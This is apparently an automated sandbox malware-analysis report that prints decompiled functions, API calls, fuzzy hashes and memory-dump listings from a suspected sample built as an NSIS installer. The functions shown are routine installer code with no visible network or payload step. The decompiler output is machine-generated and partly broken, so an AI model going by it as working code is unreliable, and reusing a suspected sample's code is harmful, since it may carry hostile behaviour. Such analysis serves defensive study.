C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
API String ID: 2655323295-326868885
Opcode ID: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
Opcode Fuzzy Hash: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405EF1(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040651A(0x7a4750, _a4);
				_t21 = E00405E94(0x7a4750);
				if(_t21 != 0) {
					E004067A1(_t21);
					if(( *0x7a8a78 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4750 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4750);
							_push(0x7a4750);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406850();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E35(0x7a4750);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DE9();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405efd
0x00405f08
0x00405f0c
0x00405f13
0x00405f1f
0x00405f2f
0x00405f31
0x00405f49
0x00405f4a
0x00405f51
0x00405f52
0x00000000
0x00000000
0x00405f35
0x00405f3c
0x00405f44
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f3c
0x00405f54
0x00000000
0x00405f68
0x00405f21
0x00405f27
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f27
0x00405f0e
0x00000000

APIs

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A

Strings

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00405EF7, 00405EFC, 00405F02, 00405F43, 00405F49, 00405F51, 00405F59
C:\Users\user\AppData\Local\Temp\, xrefs: 00405EF1

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
API String ID: 3248276644-3906918278
Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E94(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405E16(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405e9d
0x00405ea4
0x00405ea7
0x00405ea9
0x00405eaf
0x00405ec7
0x00405ee9
0x00000000
0x00405ecf
0x00405ed1
0x00405ed2
0x00405ed5
0x00405ed6
0x00405edf
0x00000000
0x00000000
0x00405ee2
0x00405ee5
0x00000000
0x00000000
0x00000000
0x00405ee5
0x00000000
0x00405ed2
0x00405ebe
0x00000000
0x00405ebf

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
CharNextW.USER32(00000000), ref: 00405EA7
CharNextW.USER32(00000000), ref: 00405EBF

Strings

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00405E95

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
API String ID: 3213498283-326868885
Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DE9(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dea
0x00405df7
0x00405df8
0x00405e03
0x00405e0b
0x00405e0b
0x00405e13

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD

Uniqueness

Uniqueness Score: -1.00%

Function 732D10E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E732D10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x732d506c = _a8;
				 *0x732d5070 = _a16;
				 *0x732d5074 = _a12;
				_a12( *0x732d5048, E732D1651, _t73);
				_t66 =  *0x732d506c +  *0x732d506c * 4 << 3;
				_t27 = E732D12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x732d5040;
							if( *0x732d5040 == 0) {
								goto L26;
							}
							E732D1603( *0x732d5074, _t31 + 4, _t66);
							_t34 =  *0x732d5040;
							_t86 = _t86 + 0xc;
							 *0x732d5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E732D1312(E732D135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E732D1381(_t80, E732D12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E732D1603(_t10,  *0x732d5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x732d5040;
							 *0x732d5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x732d5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E732D1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x732d506c +  *0x732d506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E732D1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x732d5070);
						 *( *0x732d5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x732d10eb
0x732d1100
0x732d1109
0x732d110e
0x732d1119
0x732d111c
0x732d1125
0x732d1129
0x732d112b
0x732d12b0
0x732d12ba
0x732d12ba
0x732d1132
0x732d1132
0x732d1137
0x732d1138
0x732d113a
0x732d113d
0x732d1256
0x732d1259
0x732d1271
0x732d1271
0x732d1278
0x00000000
0x00000000
0x732d1285
0x732d128a
0x732d128f
0x732d1294
0x732d129a
0x732d129b
0x00000000
0x732d129b
0x732d125b
0x732d125e
0x732d11bc
0x732d11bf
0x732d11c2
0x732d11cb
0x732d11d0
0x00000000
0x732d11d1
0x732d1264
0x732d1266
0x732d11a2
0x732d11a5
0x732d11a8
0x732d11b1
0x00000000
0x732d11b1
0x732d1164
0x732d1165
0x732d1177
0x732d1180
0x732d1184
0x732d118e
0x732d1191
0x732d1193
0x732d1193
0x00000000
0x732d1165
0x732d1143
0x732d1218
0x732d121d
0x732d1221
0x732d1223
0x732d122c
0x732d122f
0x732d1238
0x732d123d
0x732d123d
0x732d1247
0x732d124a
0x00000000
0x732d1250
0x732d1149
0x732d114c
0x732d11e9
0x732d11ed
0x732d11f7
0x732d11fb
0x732d1205
0x732d120a
0x732d1211
0x00000000
0x732d1211
0x732d1152
0x732d1155
0x00000000
0x00000000
0x732d115b
0x732d115e
0x732d11b8
0x00000000
0x732d11b8
0x732d1160
0x732d1162
0x732d119e
0x00000000
0x732d119e
0x00000000
0x732d12a1
0x732d12a1
0x732d12ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 732D1171
GlobalAlloc.KERNEL32(00000040,?), ref: 732D11E3
GlobalFree.KERNEL32 ref: 732D124A
GlobalFree.KERNEL32 ref: 732D129B
GlobalFree.KERNEL32 ref: 732D12B1

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 51004ebed27153d04282694fcf52b6b17c71a15aff33725f6956b0b8f98487d4
Instruction ID: e3ff651e2166d3cb24df631df3c397d82184fe7a002078dc9789455898fd5784
Opcode Fuzzy Hash: 51004ebed27153d04282694fcf52b6b17c71a15aff33725f6956b0b8f98487d4
Instruction Fuzzy Hash: FD51C0B6A20212DFE780DF79D848B1577F8FB08702B248115E90ADBA90E7B5F990DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040653C("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp", "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040647A(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
						_t14 = E004060BC(_t31, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll
API String ID: 1659193697-2733243549
Opcode ID: c1098a406b4845835c503be20dede65254d091413bbf81b42510f1366076b5de
Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
Opcode Fuzzy Hash: c1098a406b4845835c503be20dede65254d091413bbf81b42510f1366076b5de
Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79f700; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a6c;
						if(_t2 >  *0x7a8a6c) {
							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
							 *0x79f700 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406923(0);
					}
				} else {
					_t6 =  *0x79f700; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79f700 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
